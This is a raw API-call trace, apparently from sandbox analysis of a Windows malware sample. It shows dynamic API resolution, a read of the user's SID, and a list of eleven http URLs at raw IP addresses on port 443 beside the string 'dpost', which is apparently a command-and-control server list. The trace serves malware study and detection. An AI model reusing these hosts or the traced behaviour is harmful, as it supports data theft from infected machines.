GetProcessHeap () returned 0x560000 [0186.582] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xc) returned 0x6171e0 [0186.582] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GlobalAlloc") returned 0x7ffb26250de0 [0186.582] GetProcessHeap () returned 0x560000 [0186.583] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x6171e0 | out: hHeap=0x560000) returned 1 [0186.583] GetProcAddress (hModule=0x7ffb28a50000, lpProcName="GetTokenInformation") returned 0x7ffb28a66610 [0186.583] GetTokenInformation (in: TokenHandle=0x1ac, TokenInformationClass=0x1, TokenInformation=0x613590, TokenInformationLength=0x2c, ReturnLength=0xcfde8 | out: TokenInformation=0x613590, ReturnLength=0xcfde8) returned 1 [0186.583] GetProcAddress (hModule=0x7ffb28a50000, lpProcName="ConvertSidToStringSidW") returned 0x7ffb28a66130 [0186.583] ConvertSidToStringSidW (in: Sid=0x6135a0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65)), StringSid=0xcfdf8 | out: StringSid=0xcfdf8*="S-1-5-21-1560258661-3990802383-1811730007-1000") returned 1 [0186.583] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x20) returned 0x615a40 [0186.583] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x615a40 | out: hHeap=0x560000) returned 1 [0186.583] GetProcessHeap () returned 0x560000 [0186.583] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xb) returned 0x617080 [0186.583] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GlobalFree") returned 0x7ffb2624dcc0 [0186.583] GetProcessHeap () returned 0x560000 [0186.583] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617080 | out: hHeap=0x560000) returned 1 [0186.583] GetProcessHeap () returned 0x560000 [0186.583] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x1a) returned 0x615c00 [0186.583] GetProcAddress (hModule=0x7ffb26230000, lpProcName="InitializeCriticalSection") returned 0x7ffb28b6ced0 [0186.583] GetProcessHeap () returned 0x560000 [0186.583] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x615c00 | out: hHeap=0x560000) returned 1 [0186.583] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x18) returned 0x615c00 [0186.583] lstrlenA (lpString="") returned 0 [0186.583] GetProcessHeap () returned 0x560000 [0186.583] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x1) returned 0x617180 [0186.583] lstrcpyA (in: lpString1=0x617180, lpString2="" | out: lpString1="") returned="" [0186.583] GetProcessHeap () returned 0x560000 [0186.584] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x1) returned 0x617260 [0186.584] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x28) returned 0x613230 [0186.584] GetProcessHeap () returned 0x560000 [0186.584] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617180 | out: hHeap=0x560000) returned 1 [0186.584] GetProcessHeap () returned 0x560000 [0186.584] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x1a) returned 0x6158a0 [0186.584] GetProcAddress (hModule=0x7ffb26230000, lpProcName="InitializeCriticalSection") returned 0x7ffb28b6ced0 [0186.584] GetProcessHeap () returned 0x560000 [0186.584] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x6158a0 | out: hHeap=0x560000) returned 1 [0186.584] GetProcessHeap () returned 0x560000 [0186.584] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xd) returned 0x617140 [0186.584] GetProcAddress (hModule=0x7ffb26230000, lpProcName="CreateThread") returned 0x7ffb262516f0 [0186.584] GetProcessHeap () returned 0x560000 [0186.584] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617140 | out: hHeap=0x560000) returned 1 [0186.584] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x180009300, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0xcfe68 | out: lpThreadId=0xcfe68*=0x7bc) returned 0x1cc [0186.587] GetProcessHeap () returned 0x560000 [0186.587] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x8) returned 0x617250 [0186.587] GetProcessHeap () returned 0x560000 [0186.587] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617250 | out: hHeap=0x560000) returned 1 [0186.587] ResetEvent (hEvent=0x8) returned 1 [0186.587] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0186.850] GetProcessHeap () returned 0x560000 [0186.850] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x6) returned 0x617100 [0186.850] lstrlenA (lpString="dpost") returned 5 [0186.850] GetProcessHeap () returned 0x560000 [0186.850] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x6) returned 0x617160 [0186.850] lstrcpyA (in: lpString1=0x617160, lpString2="dpost" | out: lpString1="dpost") returned="dpost" [0186.850] GetProcessHeap () returned 0x560000 [0186.850] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x6) returned 0x617110 [0186.850] GetProcessHeap () returned 0x560000 [0186.850] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x6) returned 0x617250 [0186.850] GetProcessHeap () returned 0x560000 [0186.850] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617110 | out: hHeap=0x560000) returned 1 [0186.850] GetProcessHeap () returned 0x560000 [0186.850] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617250 | out: hHeap=0x560000) returned 1 [0186.850] GetProcessHeap () returned 0x560000 [0186.850] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617160 | out: hHeap=0x560000) returned 1 [0186.850] GetProcessHeap () returned 0x560000 [0186.850] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617100 | out: hHeap=0x560000) returned 1 [0186.850] GetProcessHeap () returned 0x560000 [0186.850] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x15) returned 0x615a40 [0186.850] GetProcAddress (hModule=0x7ffb26230000, lpProcName="EnterCriticalSection") returned 0x7ffb28b2e600 [0186.850] GetProcessHeap () returned 0x560000 [0186.850] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x615a40 | out: hHeap=0x560000) returned 1 [0186.850] GetProcessHeap () returned 0x560000 [0186.850] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x204) returned 0x611d40 [0186.851] GetProcessHeap () returned 0x560000 [0186.851] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x15) returned 0x615a40 [0186.851] GetProcAddress (hModule=0x7ffb26230000, lpProcName="EnterCriticalSection") returned 0x7ffb28b2e600 [0186.851] GetProcessHeap () returned 0x560000 [0186.851] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x615a40 | out: hHeap=0x560000) returned 1 [0186.851] lstrlenA (lpString="\r\nhttp://195.39.233.29:443\r\nhttp://178.151.205.154:443\r\nhttp://103.239.6.30:443\r\nhttp://109.87.143.67:443\r\nhttp://178.182.254.64:443\r\nhttp://77.252.26.5:443\r\nhttp://91.232.241.58:443\r\nhttp://182.160.98.250:443\r\nhttp://79.110.193.67:443\r\nhttp://182.160.99.205:443\r\nhttp://91.191.55.135:443\r\n\r\n") returned 516 [0186.851] GetProcessHeap () returned 0x560000 [0186.851] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x205) returned 0x6106a0 [0186.851] lstrcpyA (in: lpString1=0x6106a0, lpString2="\r\nhttp://195.39.233.29:443\r\nhttp://178.151.205.154:443\r\nhttp://103.239.6.30:443\r\nhttp://109.87.143.67:443\r\nhttp://178.182.254.64:443\r\nhttp://77.252.26.5:443\r\nhttp://91.232.241.58:443\r\nhttp://182.160.98.250:443\r\nhttp://79.110.193.67:443\r\nhttp://182.160.99.205:443\r\nhttp://91.191.55.135:443\r\n\r\n" | out: lpString1="\r\nhttp://195.39.233.29:443\r\nhttp://178.151.205.154:443\r\nhttp://103.239.6.30:443\r\nhttp://109.87.143.67:443\r\nhttp://178.182.254.64:443\r\nhttp://77.252.26.5:443\r\nhttp://91.232.241.58:443\r\nhttp://182.160.98.250:443\r\nhttp://79.110.193.67:443\r\nhttp://182.160.99.205:443\r\nhttp://91.191.55.135:443\r\n\r\n") returned="\r\nhttp://195.39.233.29:443\r\nhttp://178.151.205.154:443\r\nhttp://103.239.6.30:443\r\nhttp://109.87.143.67:443\r\nhttp://178.182.254.64:443\r\nhttp://77.252.26.5:443\r\nhttp://91.232.241.58:443\r\nhttp://182.160.98.250:443\r\nhttp://79.110.193.67:443\r\nhttp://182.160.99.205:443\r\nhttp://91.191.55.135:443\r\n\r\n" [0186.851] GetProcessHeap () returned 0x560000 [0186.851] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x1) returned 0x6171c0 [0186.851] GetProcessHeap () returned 0x560000 [0186.851] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x6171c0, Size=0x205) returned 0x653c00 [0186.851] GetProcessHeap () returned 0x560000 [0186.851] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x1) returned 0x617130 [0186.851] GetProcessHeap () returned 0x560000 [0186.851] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x8) returned 0x617250 [0186.851] lstrlenA (lpString="<") returned 1 [0186.851] GetProcessHeap () returned 0x560000 [0186.851] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x2) returned 0x6171c0 [0186.851] lstrcpyA (in: lpString1=0x6171c0, lpString2="<" | out: lpString1="<") returned="<" [0186.851] GetProcessHeap () returned 0x560000 [0186.851] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x2) returned 0x617100 [0186.851] GetProcessHeap () returned 0x560000 [0186.851] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x617100, Size=0x11) returned 0x615a40 [0186.851] GetProcessHeap () returned 0x560000 [0186.851] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x6171c0 | out: hHeap=0x560000) returned 1 [0186.851] lstrlenA (lpString=">") returned 1 [0186.852] GetProcessHeap () returned 0x560000 [0186.852] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x2) returned 0x617080 [0186.852] lstrcpyA (in: lpString1=0x617080, lpString2=">" | out: lpString1=">") returned=">" [0186.852] lstrlenA (lpString="") returned 1 [0186.853] GetProcessHeap () returned 0x560000 [0186.853] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x2) returned 0x617100 [0186.853] lstrcpyA (in: lpString1=0x617100, lpString2=">" | out: lpString1=">") returned=">" [0186.853] lstrlenA (lpString=">") returned 4 [0186.853] GetProcessHeap () returned 0x560000 [0186.853] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x5) returned 0x617110 [0186.853] lstrcpyA (in: lpString1=0x617110, lpString2=">" | out: lpString1=">") returned=">" [0186.853] GetProcessHeap () returned 0x560000 [0186.853] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617110 | out: hHeap=0x560000) returned 1 [0186.853] GetProcessHeap () returned 0x560000 [0186.853] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617100 | out: hHeap=0x560000) returned 1 [0186.853] GetProcessHeap () returned 0x560000 [0186.853] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x617130, Size=0x19) returned 0x615ee0 [0186.853] GetProcessHeap () returned 0x560000 [0186.853] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x615c60 | out: hHeap=0x560000) returned 1 [0186.853] GetProcessHeap () returned 0x560000 [0186.853] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x615f60 | out: hHeap=0x560000) returned 1 [0186.853] GetProcessHeap () returned 0x560000 [0186.853] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x615a40 | out: hHeap=0x560000) returned 1 [0186.853] GetProcessHeap () returned 0x560000 [0186.853] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617250 | out: hHeap=0x560000) returned 1 [0186.854] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x10) returned 0x617140 [0186.854] GetProcessHeap () returned 0x560000 [0186.854] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x19) returned 0x615a40 [0186.854] GetProcessHeap () returned 0x560000 [0186.854] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x8) returned 0x617120 [0186.854] lstrlenA (lpString="<") returned 1 [0186.854] GetProcessHeap () returned 0x560000 [0186.854] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x2) returned 0x617100 [0186.854] lstrcpyA (in: lpString1=0x617100, lpString2="<" | out: lpString1="<") returned="<" [0186.854] GetProcessHeap () returned 0x560000 [0186.854] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x2) returned 0x617250 [0186.854] GetProcessHeap () returned 0x560000 [0186.854] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x617250, Size=0x11) returned 0x615cc0 [0186.854] GetProcessHeap () returned 0x560000 [0186.854] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617100 | out: hHeap=0x560000) returned 1 [0186.854] lstrlenA (lpString=">") returned 1 [0186.854] GetProcessHeap () returned 0x560000 [0186.854] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x2) returned 0x6171c0 [0186.854] lstrcpyA (in: lpString1=0x6171c0, lpString2=">" | out: lpString1=">") returned=">" [0186.854] lstrlenA (lpString="") returned 1 [0186.855] GetProcessHeap () returned 0x560000 [0186.855] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x2) returned 0x617250 [0186.855] lstrcpyA (in: lpString1=0x617250, lpString2=">" | out: lpString1=">") returned=">" [0186.855] lstrlenA (lpString=">") returned 4 [0186.855] GetProcessHeap () returned 0x560000 [0186.855] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x5) returned 0x617100 [0186.856] lstrcpyA (in: lpString1=0x617100, lpString2=">" | out: lpString1=">") returned=">" [0186.856] GetProcessHeap () returned 0x560000 [0186.856] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617100 | out: hHeap=0x560000) returned 1 [0186.856] GetProcessHeap () returned 0x560000 [0186.856] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617250 | out: hHeap=0x560000) returned 1 [0186.856] GetProcessHeap () returned 0x560000 [0186.856] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x615ee0, Size=0x1b) returned 0x615e20 [0186.856] GetProcessHeap () returned 0x560000 [0186.856] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x615e40 | out: hHeap=0x560000) returned 1 [0186.856] GetProcessHeap () returned 0x560000 [0186.856] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x615c80 | out: hHeap=0x560000) returned 1 [0186.856] GetProcessHeap () returned 0x560000 [0186.856] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x615cc0 | out: hHeap=0x560000) returned 1 [0186.856] GetProcessHeap () returned 0x560000 [0186.856] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617120 | out: hHeap=0x560000) returned 1 [0186.856] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x20) returned 0x615f00 [0186.856] GetProcessHeap () returned 0x560000 [0186.856] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x1b) returned 0x615fa0 [0186.856] GetProcessHeap () returned 0x560000 [0186.856] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x19) returned 0x615ea0 [0186.856] GetProcessHeap () returned 0x560000 [0186.856] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x615a40 | out: hHeap=0x560000) returned 1 [0186.856] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617140 | out: hHeap=0x560000) returned 1 [0186.856] GetProcessHeap () returned 0x560000 [0186.856] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x8) returned 0x617080 [0186.856] lstrlenA (lpString="<") returned 1 [0186.856] GetProcessHeap () returned 0x560000 [0186.856] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x2) returned 0x617210 [0186.856] lstrcpyA (in: lpString1=0x617210, lpString2="<" | out: lpString1="<") returned="<" [0186.856] GetProcessHeap () returned 0x560000 [0186.856] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x2) returned 0x617150 [0186.856] GetProcessHeap () returned 0x560000 [0186.856] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x617150, Size=0x11) returned 0x615a40 [0186.856] GetProcessHeap () returned 0x560000 [0186.856] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617210 | out: hHeap=0x560000) returned 1 [0186.856] lstrlenA (lpString=">") returned 1 [0186.856] GetProcessHeap () returned 0x560000 [0186.857] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x2) returned 0x617100 [0186.857] lstrcpyA (in: lpString1=0x617100, lpString2=">" | out: lpString1=">") returned=">" [0186.857] lstrlenA (lpString="") returned 1 [0186.858] GetProcessHeap () returned 0x560000 [0186.858] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x2) returned 0x6171c0 [0186.858] lstrcpyA (in: lpString1=0x6171c0, lpString2=">" | out: lpString1=">") returned=">" [0186.858] lstrlenA (lpString=">") returned 4 [0186.858] GetProcessHeap () returned 0x560000 [0186.858] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x5) returned 0x617250 [0186.858] lstrcpyA (in: lpString1=0x617250, lpString2=">" | out: lpString1=">") returned=">" [0186.858] GetProcessHeap () returned 0x560000 [0186.858] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617250 | out: hHeap=0x560000) returned 1 [0186.858] GetProcessHeap () returned 0x560000 [0186.858] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x6171c0 | out: hHeap=0x560000) returned 1 [0186.858] GetProcessHeap () returned 0x560000 [0186.858] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x615dc0 | out: hHeap=0x560000) returned 1 [0186.858] GetProcessHeap () returned 0x560000 [0186.858] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x615e40 | out: hHeap=0x560000) returned 1 [0186.858] GetProcessHeap () returned 0x560000 [0186.860] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x615a40 | out: hHeap=0x560000) returned 1 [0186.861] GetProcessHeap () returned 0x560000 [0186.861] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617080 | out: hHeap=0x560000) returned 1 [0186.861] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x30) returned 0x613620 [0186.861] GetProcessHeap () returned 0x560000 [0186.861] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x18) returned 0x615a40 [0186.861] GetProcessHeap () returned 0x560000 [0186.861] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x19) returned 0x615dc0 [0186.861] GetProcessHeap () returned 0x560000 [0186.861] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x1b) returned 0x615f20 [0186.861] GetProcessHeap () returned 0x560000 [0186.861] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x615ea0 | out: hHeap=0x560000) returned 1 [0186.861] GetProcessHeap () returned 0x560000 [0186.861] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x615fa0 | out: hHeap=0x560000) returned 1 [0186.861] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x615f00 | out: hHeap=0x560000) returned 1 [0186.861] GetProcessHeap () returned 0x560000 [0186.861] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x8) returned 0x617190 [0186.861] lstrlenA (lpString="<") returned 1 [0186.861] GetProcessHeap () returned 0x560000 [0186.861] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x2) returned 0x617100 [0186.861] lstrcpyA (in: lpString1=0x617100, lpString2="<" | out: lpString1="<") returned="<" [0186.861] GetProcessHeap () returned 0x560000 [0186.861] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x2) returned 0x617210 [0186.861] GetProcessHeap () returned 0x560000 [0186.861] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x617210, Size=0x11) returned 0x615e00 [0186.861] GetProcessHeap () returned 0x560000 [0186.861] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617100 | out: hHeap=0x560000) returned 1 [0186.861] lstrlenA (lpString=">") returned 1 [0186.861] GetProcessHeap () returned 0x560000 [0186.861] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x2) returned 0x617250 [0186.861] lstrcpyA (in: lpString1=0x617250, lpString2=">" | out: lpString1=">") returned=">" [0186.861] lstrlenA (lpString="") returned 1 [0186.863] GetProcessHeap () returned 0x560000 [0186.863] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x2) returned 0x617160 [0186.863] lstrcpyA (in: lpString1=0x617160, lpString2=">" | out: lpString1=">") returned=">" [0186.863] lstrlenA (lpString=">") returned 4 [0186.863] GetProcessHeap () returned 0x560000 [0186.863] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x5) returned 0x6171c0 [0186.863] lstrcpyA (in: lpString1=0x6171c0, lpString2=">" | out: lpString1=">") returned=">" [0186.863] GetProcessHeap () returned 0x560000 [0186.863] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x6171c0 | out: hHeap=0x560000) returned 1 [0186.863] GetProcessHeap () returned 0x560000 [0186.863] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617160 | out: hHeap=0x560000) returned 1 [0186.863] GetProcessHeap () returned 0x560000 [0186.863] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x615d60 | out: hHeap=0x560000) returned 1 [0186.863] GetProcessHeap () returned 0x560000 [0186.863] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x615d40 | out: hHeap=0x560000) returned 1 [0186.863] GetProcessHeap () returned 0x560000 [0186.863] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x615e00 | out: hHeap=0x560000) returned 1 [0186.863] GetProcessHeap () returned 0x560000 [0186.863] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617190 | out: hHeap=0x560000) returned 1 [0186.863] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x40) returned 0x616ad0 [0186.863] GetProcessHeap () returned 0x560000 [0186.863] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x19) returned 0x615cc0 [0186.863] GetProcessHeap () returned 0x560000 [0186.863] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x19) returned 0x615c60 [0186.863] GetProcessHeap () returned 0x560000 [0186.863] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x1b) returned 0x615d80 [0186.863] GetProcessHeap () returned 0x560000 [0186.863] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x18) returned 0x615ee0 [0186.864] GetProcessHeap () returned 0x560000 [0186.864] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x615dc0 | out: hHeap=0x560000) returned 1 [0186.864] GetProcessHeap () returned 0x560000 [0186.864] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x615f20 | out: hHeap=0x560000) returned 1 [0186.864] GetProcessHeap () returned 0x560000 [0186.864] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x615a40 | out: hHeap=0x560000) returned 1 [0186.864] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x613620 | out: hHeap=0x560000) returned 1 [0186.864] GetProcessHeap () returned 0x560000 [0186.864] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x8) returned 0x617180 [0186.864] lstrlenA (lpString="<") returned 1 [0186.864] GetProcessHeap () returned 0x560000 [0186.864] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x2) returned 0x617080 [0186.864] lstrcpyA (in: lpString1=0x617080, lpString2="<" | out: lpString1="<") returned="<" [0186.864] GetProcessHeap () returned 0x560000 [0186.864] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x2) returned 0x617210 [0186.864] GetProcessHeap () returned 0x560000 [0186.864] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x617210, Size=0x11) returned 0x615a40 [0186.864] GetProcessHeap () returned 0x560000 [0186.864] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617080 | out: hHeap=0x560000) returned 1 [0186.864] lstrlenA (lpString=">") returned 1 [0186.864] GetProcessHeap () returned 0x560000 [0186.864] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x2) returned 0x617080 [0186.864] lstrcpyA (in: lpString1=0x617080, lpString2=">" | out: lpString1=">") returned=">" [0186.864] lstrlenA (lpString="") returned 1 [0186.865] GetProcessHeap () returned 0x560000 [0186.865] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x2) returned 0x6171d0 [0186.865] lstrcpyA (in: lpString1=0x6171d0, lpString2=">" | out: lpString1=">") returned=">" [0186.865] lstrlenA (lpString=">") returned 4 [0186.866] GetProcessHeap () returned 0x560000 [0186.866] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x5) returned 0x6171e0 [0186.866] lstrcpyA (in: lpString1=0x6171e0, lpString2=">" | out: lpString1=">") returned=">" [0186.866] GetProcessHeap () returned 0x560000 [0186.866] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x6171e0 | out: hHeap=0x560000) returned 1 [0186.866] GetProcessHeap () returned 0x560000 [0186.866] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x6171d0 | out: hHeap=0x560000) returned 1 [0186.866] GetProcessHeap () returned 0x560000 [0186.866] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x615ce0 | out: hHeap=0x560000) returned 1 [0186.866] GetProcessHeap () returned 0x560000 [0186.866] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x615f20 | out: hHeap=0x560000) returned 1 [0186.866] GetProcessHeap () returned 0x560000 [0186.866] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x615a40 | out: hHeap=0x560000) returned 1 [0186.866] GetProcessHeap () returned 0x560000 [0186.866] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617180 | out: hHeap=0x560000) returned 1 [0186.866] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x60) returned 0x6198f0 [0186.866] GetProcessHeap () returned 0x560000 [0186.866] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x1a) returned 0x615a40 [0186.866] GetProcessHeap () returned 0x560000 [0186.866] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x19) returned 0x615ce0 [0186.866] GetProcessHeap () returned 0x560000 [0186.866] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x1b) returned 0x615de0 [0186.866] GetProcessHeap () returned 0x560000 [0186.866] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x18) returned 0x615c80 [0186.866] GetProcessHeap () returned 0x560000 [0186.866] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x19) returned 0x615d00 [0186.866] GetProcessHeap () returned 0x560000 [0186.866] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x615c60 | out: hHeap=0x560000) returned 1 [0186.866] GetProcessHeap () returned 0x560000 [0186.866] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x615d80 | out: hHeap=0x560000) returned 1 [0186.866] GetProcessHeap () returned 0x560000 [0186.866] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x615ee0 | out: hHeap=0x560000) returned 1 [0186.866] GetProcessHeap () returned 0x560000 [0186.866] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x615cc0 | out: hHeap=0x560000) returned 1 [0186.866] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x616ad0 | out: hHeap=0x560000) returned 1 [0186.866] GetProcessHeap () returned 0x560000 [0186.866] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x8) returned 0x617250 [0186.866] lstrlenA (lpString="<") returned 1 [0186.866] GetProcessHeap () returned 0x560000 [0186.867] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x2) returned 0x617100 [0186.867] lstrcpyA (in: lpString1=0x617100, lpString2="<" | out: lpString1="<") returned="<" [0186.867] GetProcessHeap () returned 0x560000 [0186.867] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x2) returned 